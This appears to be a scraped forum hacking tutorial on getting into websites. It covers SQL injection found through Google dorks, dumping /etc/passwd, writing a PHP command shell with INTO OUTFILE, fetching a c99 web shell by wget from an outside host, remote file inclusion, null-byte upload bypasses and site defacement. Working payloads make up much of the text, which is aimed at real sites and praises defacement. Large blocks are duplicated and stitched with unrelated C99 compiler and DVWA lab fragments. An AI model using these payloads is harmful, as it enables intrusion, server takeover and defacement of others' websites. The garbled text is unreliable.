First of all find a website which is vulnerable to sql injection you can find websites by dorks or manually XD like i have found this.
You need 2 main things
1) Root Path of the website
2) A Writable Directory
If the vulnerable website does'nt show the root path then don't worry i will tell you how to know the root path. :D
And Also Writeable Directory.
www.site.com/index.php?id=10'
I am not starting with abc of sqli hope u know the basics :D
Now we have to found columns of the website then vulnerable columns like my site have 5 columns And 3 is the vulnerable column
www.site.com/index.php?id=-10 UniOn SeleCt 1,2,3,4,5--
www.site.com/index.php?id=-10 UniOn SeleCt 1,2,version(),4,5--
Let's Try To Load Files Of The Website
www.site.com/index.php?id=-10 UniOn SeleCt 1,2,load_file('/etc/passwd'),4,5--
www.site.com/index.php?id=-10 UniOn SeleCt 1,2,load_file('/etc/my.cnf'),4,5--
www.site.com/index.php?id=-10 UniOn SeleCt 1,2,load_file('/etc/group'),4,5--
www.site.com/index.php?id=-10 UniOn SeleCt 1,2,load_file('/etc/services'),4,5--
www.site.com/index.php?id=-10 UniOn SeleCt 1,2,load_file('/etc/hosts'),4,5--
We Won't Need To Read Any Files Mentioned above just to increase your knowledge :D
Now we have to checked the file privilage for the current user for this first you have to find current username.
Like This
www.site.com/index.php?id=-10 UniOn SeleCt 1,2,current_user,4,5--
Our Current Username is etc mine is Ch3rn0by1
Now Check File Privilages for User Ch3rn0by1
www.site.com/index.php?id=-10 UniOn SeleCt 1,2,file_priv,4,5 FROM mysql.user WHERE user='Ch3rn0by1'--
If it shows Y (yes) on the vulnerable column of the website that means we have the file privilages for the current user Ch3rn0by1
And if it is'nt shows Y than Dont waste your time there :D
Ok Now we have to know the root path :D for this we have to know the software which is used in the server
you can use havij and etc/passwd and many more softwares etc/passwd is'nt a software LOL
To know the server software by file etc/passwd use this query
www.site.com/index.php?id=-10 UniOn SeleCt 1,2,3,load_file('etc/passwd'),5--
now we have our server software etc (/home/Ch3rn0by1)
now read one more file.
www.site.com/index.php?id=-10 UniOn SeleCt 1,2,load_file('etc/Ch3rn0by1.conf')4,5--
Where Ch3rn0by1 is your server software name like server name.conf :D
now we have the root path
/home/site.com/public_html etc.
Now we have to find a writeable directory for this you can use google dorks as well and your knowledge too :D
site www.site.com/dir/*/*/*/*/
so its site.com/ch3rn0by1/writeable
now we will upload our evil code
www.site.com/index.php?id=10 UniOn SeleCt 1,2,'<?system($_REQUEST['cmd']);?>',4,5 into outfile '/home/site/public_html/Ch3rn0by1/writeable directory/Ch3rn0by1.php'--+
ok now we have to execute our commands
www.site.com/Ch3rn0by1/writeable directory/Ch3rn0by1.php?cmd=pwd
www.site.com/Ch3rn0by1/writeable directory/Ch3rn0by1.php?cmd=uname -a
Now we will use wget command to upload our evil script
www.site.com/Ch3rn0by1/writeable directory/Ch3rn0by1.php?cmd=wget http://www.shellsite.com/c99.txt
Now we will rename our c99.txt to php in order to execute it :D
www.site.com/Ch3rn0by1/writeable directory/Ch3rn0by1.php?cmd=mv c99.txt c99.php
now open it
www.site.com/Ch3rn0by1/writeable directory/c99.php VOILA OUR SHELL GOT LIVE :D
You need 2 main things
1) Root Path of the website
2) A Writable Directory
If the vulnerable website does'nt show the root path then don't worry i will tell you how to know the root path. :D
And Also Writeable Directory.
www.site.com/index.php?id=10'
I am not starting with abc of sqli hope u know the basics :D
Now we have to found columns of the website then vulnerable columns like my site have 5 columns And 3 is the vulnerable column
www.site.com/index.php?id=-10 UniOn SeleCt 1,2,3,4,5--
www.site.com/index.php?id=-10 UniOn SeleCt 1,2,version(),4,5--
Let's Try To Load Files Of The Website
www.site.com/index.php?id=-10 UniOn SeleCt 1,2,load_file('/etc/passwd'),4,5--
www.site.com/index.php?id=-10 UniOn SeleCt 1,2,load_file('/etc/my.cnf'),4,5--
www.site.com/index.php?id=-10 UniOn SeleCt 1,2,load_file('/etc/group'),4,5--
www.site.com/index.php?id=-10 UniOn SeleCt 1,2,load_file('/etc/services'),4,5--
www.site.com/index.php?id=-10 UniOn SeleCt 1,2,load_file('/etc/hosts'),4,5--
We Won't Need To Read Any Files Mentioned above just to increase your knowledge :D
Now we have to checked the file privilage for the current user for this first you have to find current username.
Like This
www.site.com/index.php?id=-10 UniOn SeleCt 1,2,current_user,4,5--
Our Current Username is etc mine is Ch3rn0by1
Now Check File Privilages for User Ch3rn0by1
www.site.com/index.php?id=-10 UniOn SeleCt 1,2,file_priv,4,5 FROM mysql.user WHERE user='Ch3rn0by1'--
If it shows Y (yes) on the vulnerable column of the website that means we have the file privilages for the current user Ch3rn0by1
And if it is'nt shows Y than Dont waste your time there :D
Ok Now we have to know the root path :D for this we have to know the software which is used in the server
you can use havij and etc/passwd and many more softwares etc/passwd is'nt a software LOL
To know the server software by file etc/passwd use this query
www.site.com/index.php?id=-10 UniOn SeleCt 1,2,3,load_file('etc/passwd'),5--
now we have our server software etc (/home/Ch3rn0by1)
now read one more file.
www.site.com/index.php?id=-10 UniOn SeleCt 1,2,load_file('etc/Ch3rn0by1.conf')4,5--
Where Ch3rn0by1 is your server software name like server name.conf :D
now we have the root path
/home/site.com/public_html etc.
Now we have to find a writeable directory for this you can use google dorks as well and your knowledge too :D
site www.site.com/dir/*/*/*/*/
so its site.com/ch3rn0by1/writeable
now we will upload our evil code
www.site.com/index.php?id=10 UniOn SeleCt 1,2,'<?system($_REQUEST['cmd']);?>',4,5 into outfile '/home/site/public_html/Ch3rn0by1/writeable directory/Ch3rn0by1.php'--+
ok now we have to execute our commands
www.site.com/Ch3rn0by1/writeable directory/Ch3rn0by1.php?cmd=pwd
www.site.com/Ch3rn0by1/writeable directory/Ch3rn0by1.php?cmd=uname -a
Now we will use wget command to upload our evil script
www.site.com/Ch3rn0by1/writeable directory/Ch3rn0by1.php?cmd=wget http://www.shellsite.com/c99.txt
Now we will rename our c99.txt to php in order to execute it :D
www.site.com/Ch3rn0by1/writeable directory/Ch3rn0by1.php?cmd=mv c99.txt c99.php
now open it
www.site.com/Ch3rn0by1/writeable directory/c99.php VOILA OUR SHELL GOT LIVE :D
Uploading c99 shell in bWAPP application via SQL Injection vulnerability. So to change your makefile to make it compile with C99, you need to change the Makefile in the 'build' directory that your makefile is referencing, and add the '-std=c99' at the 'gcc' line compiling the source file.
#
The c99 shell is almost always used in remote file includes. That means that you get the remote server to 'host' the shell without any needing to upload it to take control over it. Read: RFI
#
#
A remote include works like this:
#
#
A website written in PHP includes files from a local directory. It usually looks something like this in the URL: 'http://test.com/index.php?file=whatever' The part after the '?file=' is the locally included file. I'm really not going to get into how the RFI actually works, because it's beyond the scope of this. So, to include the file you would host it locally in a .txt and include it by doing : 'http://test.com/index.php?file=http://yoursite.com/index.php?file=c99shell.txt?.php
#
#
Get it?
#
(I can't quite remember how to run it via URL because it's been so damn long since I've done it. lol)
#
#
Now, what Clover was talking about is using a Null Byte attack. You just upload your shell via an upload form. Because most forms filter out certain extensions uploading .php is almost impossible. With a Null Byte attack though, it's made possible.
#
#
Now, lets take our usual picture upload form. This form filters out extensions such as .exe, .js, .php, .xml and so on and so forth. So if you were to try and upload C:My Documentsshell.php it would return an error. The Null Byte works around this simple security measure because a Null Byte can be used as a string terminator. In simple terms, it tells the server where the string ends. Now, how it works. As we know, if we try to upload with a .php extension, we get returned an error. If we add a Null Byte to that string, with an acceptable extension we can bypass the extension check of the form. The Null Byte is represented in simple text for as '. So, back to the upload form we go. As we go to upload our shell 'C:My Documentsshell.php' we will add to the end of that a Null Byte along with an extension. Now it looks something like this 'C:My Documentsshell.php.jpg'
#
#
(extra info: Most forms now prohibit the use of special characters such as %,#,@,*,$ just for this reason. Forms now also prevent the clicking in the text area to prevent the addition of string terminators' and the like)
#
#
Now, the problem that I always ran into when I first started using Null Byte attacks was that I could never find where it went. It would upload fine, but I could never actually execute the shell. This was worked around by using HTTPLiveHeaders (firefox addon). Monitoring while I uploaded the shell would give me the exact location of where the file was stored. Copy the destination of the uploaded file and paste into the URL bar and everything would work out from there. Of course, that is if the person doesn't have a script to automatically check the extension again and assign the proper one, or if they use a script to copy, move to another destination, and delete.
#
#
Everyone got it now?
#
#
If all things go according to plan, your shell shall be uploaded and you can now take control.
II)
---
Defacing a Site using a c99 shell
Okay first what is defacing? Well defacing is like you remove some contents of the site and show that it has been hacked by you. Defacing is a very good way of proving your a good hacker. Okay so lets get started
First you need a c99 shell, which can be easily found on google
Your antivirus might think its a virus but it isnt! Okay now you will need to find exploitable sites. Here are some ways to find it
Google Dork:
That is one way of finding a c99 shell. See always upload a c99 shell with a .TXT or .JPG extension. You can change the extension but it wont change anything in the shell. I just leave mine as a c99.txt.
Another way of finding vulnerable sites is finding a random website that shows
On that page= you can put your shell so it would look like
credits To RiTaLiN
The c99 shell is almost always used in remote file includes. That means that you get the remote server to 'host' the shell without any needing to upload it to take control over it. Read: RFI
#
#
A remote include works like this:
#
#
A website written in PHP includes files from a local directory. It usually looks something like this in the URL: 'http://test.com/index.php?file=whatever' The part after the '?file=' is the locally included file. I'm really not going to get into how the RFI actually works, because it's beyond the scope of this. So, to include the file you would host it locally in a .txt and include it by doing : 'http://test.com/index.php?file=http://yoursite.com/index.php?file=c99shell.txt?.php
#
#
Get it?
#
(I can't quite remember how to run it via URL because it's been so damn long since I've done it. lol)
#
#
Now, what Clover was talking about is using a Null Byte attack. You just upload your shell via an upload form. Because most forms filter out certain extensions uploading .php is almost impossible. With a Null Byte attack though, it's made possible.
#
#
Now, lets take our usual picture upload form. This form filters out extensions such as .exe, .js, .php, .xml and so on and so forth. So if you were to try and upload C:My Documentsshell.php it would return an error. The Null Byte works around this simple security measure because a Null Byte can be used as a string terminator. In simple terms, it tells the server where the string ends. Now, how it works. As we know, if we try to upload with a .php extension, we get returned an error. If we add a Null Byte to that string, with an acceptable extension we can bypass the extension check of the form. The Null Byte is represented in simple text for as '. So, back to the upload form we go. As we go to upload our shell 'C:My Documentsshell.php' we will add to the end of that a Null Byte along with an extension. Now it looks something like this 'C:My Documentsshell.php.jpg'
#
#
(extra info: Most forms now prohibit the use of special characters such as %,#,@,*,$ just for this reason. Forms now also prevent the clicking in the text area to prevent the addition of string terminators' and the like)
#
#
Now, the problem that I always ran into when I first started using Null Byte attacks was that I could never find where it went. It would upload fine, but I could never actually execute the shell. This was worked around by using HTTPLiveHeaders (firefox addon). Monitoring while I uploaded the shell would give me the exact location of where the file was stored. Copy the destination of the uploaded file and paste into the URL bar and everything would work out from there. Of course, that is if the person doesn't have a script to automatically check the extension again and assign the proper one, or if they use a script to copy, move to another destination, and delete.
#
#
Everyone got it now?
#
#
If all things go according to plan, your shell shall be uploaded and you can now take control.
II)
---
Defacing a Site using a c99 shell
Okay first what is defacing? Well defacing is like you remove some contents of the site and show that it has been hacked by you. Defacing is a very good way of proving your a good hacker. Okay so lets get started
First you need a c99 shell, which can be easily found on google
Your antivirus might think its a virus but it isnt! Okay now you will need to find exploitable sites. Here are some ways to find it
Google Dork:
Quote:inurl:'upload.php'
Quote:inurl:'page=home.html'
Quote:inurl:'news/id='
That is one way of finding a c99 shell. See always upload a c99 shell with a .TXT or .JPG extension. You can change the extension but it wont change anything in the shell. I just leave mine as a c99.txt.
Another way of finding vulnerable sites is finding a random website that shows
Quote:http://site.com/page=
On that page= you can put your shell so it would look like
Quote:http://site.com/page=http://geocities.co...13/c99.txt
credits To RiTaLiN
C99shell Upload
- Figure 6 provides a screenshot of the c99 PHP shell running on a web server. Pre-Requisite Labs. Damn Vulnerable Web App (DVWA): Lesson 1: How to Install DVWA in Fedora 14; Lab Notes. In this lab we will do the following: We will download C99.php. We will upload C99.php to the DVWA Upload screen. We will search for sensitive database files.
- The c99 shell allows an attacker to hijack the web server process, allowing the attacker to issue commands on the server as the account under which PHP is running. The c99 shell allows an attacker to browse the filesystem, upload, view, and edit files as well as move files, delete files, and even change permissions, all as the web server.